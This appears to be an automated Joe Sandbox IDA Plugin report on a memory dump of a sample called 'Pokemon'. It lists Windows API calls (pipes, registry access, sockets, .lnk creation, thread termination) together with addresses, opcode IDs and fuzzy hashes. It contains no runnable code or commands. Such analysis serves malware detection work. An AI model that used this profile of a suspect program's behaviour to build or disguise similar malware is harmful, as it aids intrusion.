                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 80fe31b870e4861880f0ac89e030264b889547926d9c7f909a3bb18aa26ae47e
                                                                                                                                                                                                                                                                                      • Instruction ID: 49320900e6b467aaa23a2cb745c80c8e540bea3d68982d8cb807ec70341e9a5c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 80fe31b870e4861880f0ac89e030264b889547926d9c7f909a3bb18aa26ae47e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6314430704265AFDB21CF48EC84F6437A1FB8A718F1512A4F5249F6B1CBB8ADA5CB01
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F80D0
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F80F6
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 000F80F9
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8117
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 000F8120
                                                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000F8145
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8153
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d88620ecbfc29abd2d6bef38fe6c40fac2928b561083facb7ad99dbba96153a
                                                                                                                                                                                                                                                                                      • Instruction ID: b15693a27cc437c5c4945d01fb7dfdd1ed940dcf125382ec7f9c8acbfe13fcae
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d88620ecbfc29abd2d6bef38fe6c40fac2928b561083facb7ad99dbba96153a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16217172600219BF9F60ABA8DC84CFA73ECFB493607048525FA05DB690DB70AC869760
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F81A9
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 000F81CF
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 000F81D2
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 000F81F3
                                                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 000F81FC
                                                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 000F8216
                                                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 000F8224
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 914c6839675ab62ed9747cf6d93844288ef88d0ddcd8a94b058b818b894280ad
                                                                                                                                                                                                                                                                                      • Instruction ID: 4bf14e626bbc50dd794e257db89824dc5a3641d350adca96feb87d1bc3494961
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 914c6839675ab62ed9747cf6d93844288ef88d0ddcd8a94b058b818b894280ad
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F214775604508BFDB50ABACEC89DFA77ECEB09360714C125FA05CB5A1DA70EC82DB64
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00100E99
                                                                                                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00100ED5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                                                                                                      • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                      • Opcode ID: a535187e6ff3040b97b150e5df13d31ecbf8233faac3747f355ac62c5ab5f142
                                                                                                                                                                                                                                                                                      • Instruction ID: e8ff63590c6aa858270b610afb32c72e2deaf08adb84ce5b4ae35d60cb769ed5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a535187e6ff3040b97b150e5df13d31ecbf8233faac3747f355ac62c5ab5f142
• Instruction Fuzzy Hash: 2F216D7050030AAFDB318F64DC05B9A77A8BF59760F204A19FCE5E72D0DBB0A851DB50
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00100F6D
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00100FA8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• API String ID: 1424370930-2873401336
• Opcode ID: 62ccdfd8b9691f385e4b8bad25b8441716acabc468a418fc8b50cb6035776920
• Instruction ID: 95c5495b3cd06e3585f15c27f1cace4ed10105bfc8bce30836d702b1bb134288
• Opcode Fuzzy Hash: 62ccdfd8b9691f385e4b8bad25b8441716acabc468a418fc8b50cb6035776920
• Instruction Fuzzy Hash: 19218E71600346FFDB309F68DC04A9A77A8BF59720F200A19F8E1E32D4DBB59991DB50
APIs
  • Part of subcall function 00097873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 000978B1
  • Part of subcall function 00097873: GetStockObject.GDI32(00000011), ref: 000978C5
  • Part of subcall function 00097873: SendMessageW.USER32(00000000,00000030,00000000), ref: 000978CF
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00124BB0
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00124BBD
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00124BC8
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00124BD7
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00124BE3
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 26ec28788799795a0842c9364997bb68b04041e7d191ea542e9512c10375e3fd
• Instruction ID: 5a7c98bfe01010153d12410e32f1962894e0ee79e8adffe798ac30aa00d3edd1
• Opcode Fuzzy Hash: 26ec28788799795a0842c9364997bb68b04041e7d191ea542e9512c10375e3fd
• Instruction Fuzzy Hash: 7D1193B2150219BFEF118E64DC85EE77FADEF08798F014110FA18A6050CB72DC619BA0
APIs
  • Part of subcall function 000CDB23: _free.LIBCMT ref: 000CDB4C
• _free.LIBCMT ref: 000CDBAD
  • Part of subcall function 000C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4), ref: 000C2D4E
  • Part of subcall function 000C2D38: GetLastError.KERNEL32(00161DC4,?,000CDB51,00161DC4,00000000,00161DC4,00000000,?,000CDB78,00161DC4,00000007,00161DC4,?,000CDF75,00161DC4,00161DC4), ref: 000C2D60
• _free.LIBCMT ref: 000CDBB8
• _free.LIBCMT ref: 000CDBC3
• _free.LIBCMT ref: 000CDC17
• _free.LIBCMT ref: 000CDC22
• _free.LIBCMT ref: 000CDC2D
• _free.LIBCMT ref: 000CDC38
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction ID: 0b905019390ac4c2fcacedc262cb64f033803867bc1a429a47aa0c8bbaef556a
• Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
• Instruction Fuzzy Hash: B4110A72541B04EAD624FBB0CC47FCF77ECAF14700F414C2EB29AAA663DB65B9448651
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 000FE328
• LoadStringW.USER32(00000000), ref: 000FE32F
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 000FE345
• LoadStringW.USER32(00000000), ref: 000FE34C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 000FE390
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 000FE36D
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
• Opcode ID: 17d60b5edc12d4046b83b884a1791cecf97cc612cde9f5808c06e4622c3ceb01
• Instruction ID: eb49f01bcb24d13f9fb40383af1cfad3389a0a96ac1ab0cbf4c18c5f9ada318c
• Opcode Fuzzy Hash: 17d60b5edc12d4046b83b884a1791cecf97cc612cde9f5808c06e4622c3ceb01
• Instruction Fuzzy Hash: FD0162F2900208BFE72197A4ED89EFB776CD708301F004591B70AE6451E6749E958B71
APIs
• InterlockedExchange.KERNEL32(?,?), ref: 00101322
• EnterCriticalSection.KERNEL32(00000000,?), ref: 00101334
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00101342
                                                                                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00101350
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0010135F
                                                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0010136F
                                                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 00101376
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 96d54c872e7af1c4234460e8d361e0d3bbb6846fd619a156d02298821561b146
                                                                                                                                                                                                                                                                                      • Instruction ID: 4e97b3502cb053482036776196486b7f4006050b41d4112648e8d09841ac9a1d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96d54c872e7af1c4234460e8d361e0d3bbb6846fd619a156d02298821561b146
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9F0C932042612FFD7615B54FE49BD6BB39BF04312F402121F10295CA0877494B2CF90
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0011281D
                                                                                                                                                                                                                                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0011283E
                                                                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 0011284F
                                                                                                                                                                                                                                                                                      • htons.WSOCK32(?,?,?,?,?), ref: 00112938
                                                                                                                                                                                                                                                                                      • inet_ntoa.WSOCK32(?), ref: 001128E9
                                                                                                                                                                                                                                                                                        • Part of subcall function 000F433E: _strlen.LIBCMT ref: 000F4348
                                                                                                                                                                                                                                                                                        • Part of subcall function 00113C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0010F669), ref: 00113C9D
                                                                                                                                                                                                                                                                                      • _strlen.LIBCMT ref: 00112992
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a55febe89c755c5a9e6877cb03aa1f55039b6e027a9289bf608f4424fe783431
                                                                                                                                                                                                                                                                                      • Instruction ID: 533a776ff48290dd9cb9d0fbaa13c632e9420ede031223be0f396e839731df6d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a55febe89c755c5a9e6877cb03aa1f55039b6e027a9289bf608f4424fe783431
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12B1E031604300AFD728DF24D885EAABBE5AF95318F54855CF4564B2E3DB31ED82CB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C042A
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C0446
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C045D
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C047B
                                                                                                                                                                                                                                                                                      • __allrem.LIBCMT ref: 000C0492
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000C04B0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                      • Instruction ID: da3a97833135c7ed3163faa800c2a1c9a7d4f18dea1dd12a11d5e1d5e3d4a8d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1881A272A00706EBE724AF69CC82FAF73E9AF54724F24412EF515D6682E770DA00C794
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,000B8649,000B8649,?,?,?,000C67C2,00000001,00000001,8BE85006), ref: 000C65CB
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,000C67C2,00000001,00000001,8BE85006,?,?,?), ref: 000C6651
                                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 000C674B
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6758
                                                                                                                                                                                                                                                                                        • Part of subcall function 000C3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,000B6A79,?,0000015D,?,?,?,?,000B85B0,000000FF,00000000,?,?), ref: 000C3BC5
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6761
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 000C6786
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
  • Part of subcall function 0009B329: _wcslen.LIBCMT ref: 0009B333
  • Part of subcall function 0011D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0011C10E,?,?), ref: 0011D415
  • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D451
  • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4C8
  • Part of subcall function 0011D3F8: _wcslen.LIBCMT ref: 0011D4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0011C72A
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0011C785
• RegCloseKey.ADVAPI32(00000000), ref: 0011C7CA
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0011C7F9
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0011C853
• RegCloseKey.ADVAPI32(?), ref: 0011C85F
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
• String ID:
• API String ID: 1120388591-0
APIs
• VariantInit.OLEAUT32(00000035), ref: 000F00A9
• SysAllocString.OLEAUT32(00000000), ref: 000F0150
• VariantCopy.OLEAUT32(000F0354,00000000), ref: 000F0179
• VariantClear.OLEAUT32(000F0354), ref: 000F019D
• VariantCopy.OLEAUT32(000F0354,00000000), ref: 000F01A1
• VariantClear.OLEAUT32(?), ref: 000F01AB
Similarity
• API ID: Variant$ClearCopy$AllocInitString
• String ID:
• API String ID: 3859894641-0
APIs
  • Part of subcall function 000941EA: _wcslen.LIBCMT ref: 000941EF
  • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
• GetOpenFileNameW.COMDLG32(00000058), ref: 00109F2A
• _wcslen.LIBCMT ref: 00109F4B
• _wcslen.LIBCMT ref: 00109F72
• GetSaveFileNameW.COMDLG32(00000058), ref: 00109FCA
Strings
Similarity
• API ID: _wcslen$FileName$OpenSave
• String ID: X
• API String ID: 83654149-3081909835
APIs
• _wcslen.LIBCMT ref: 00106F21
• CoInitialize.OLE32(00000000), ref: 0010707E
• CoCreateInstance.OLE32(00130CC4,00000000,00000001,00130B34,?), ref: 00107095
• CoUninitialize.OLE32 ref: 00107319
Strings
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                      • Opcode ID: b1e200e4c7bef2b66b3cc4c9ab3c5f24635ceedaa356af4ef9246b52e2998773
                                                                                                                                                                                                                                                                                      • Instruction ID: 462448671047e15f4a2a4b8fce178d2f2da01656a44d71d085646d696c6d6378
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e200e4c7bef2b66b3cc4c9ab3c5f24635ceedaa356af4ef9246b52e2998773
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53D16771508301AFD700EF24C8819ABB7E8FF99704F40896DF5959B2A2EB71ED05CB92
APIs
  • Part of subcall function 0009249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000924B0
• BeginPaint.USER32(?,?,?), ref: 00091B35
• GetWindowRect.USER32(?,?), ref: 00091B99
• ScreenToClient.USER32(?,?), ref: 00091BB6
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00091BC7
• EndPaint.USER32(?,?,?,?,?), ref: 00091C15
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 000D3287
  • Part of subcall function 00091C2D: BeginPath.GDI32(00000000), ref: 00091C4B
Similarity
• API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
• String ID:
• API String ID: 3050599898-0
• Opcode ID: d5330cbb62af136cfc513457df7c9ed3be917c6961e37552a9a380d9d4707bc8
• Instruction ID: 439cc62325b9fa57bcb334e3d5700b2d174fa864fd46335f08640793325eaac0
• Opcode Fuzzy Hash: d5330cbb62af136cfc513457df7c9ed3be917c6961e37552a9a380d9d4707bc8
• Instruction Fuzzy Hash: 8E41D470605701AFDB20DF24DC85FFA7BE8EF45324F140669F964872A1C7709985EB62
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 001011B3
• ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 001011EE
• EnterCriticalSection.KERNEL32(?), ref: 0010120A
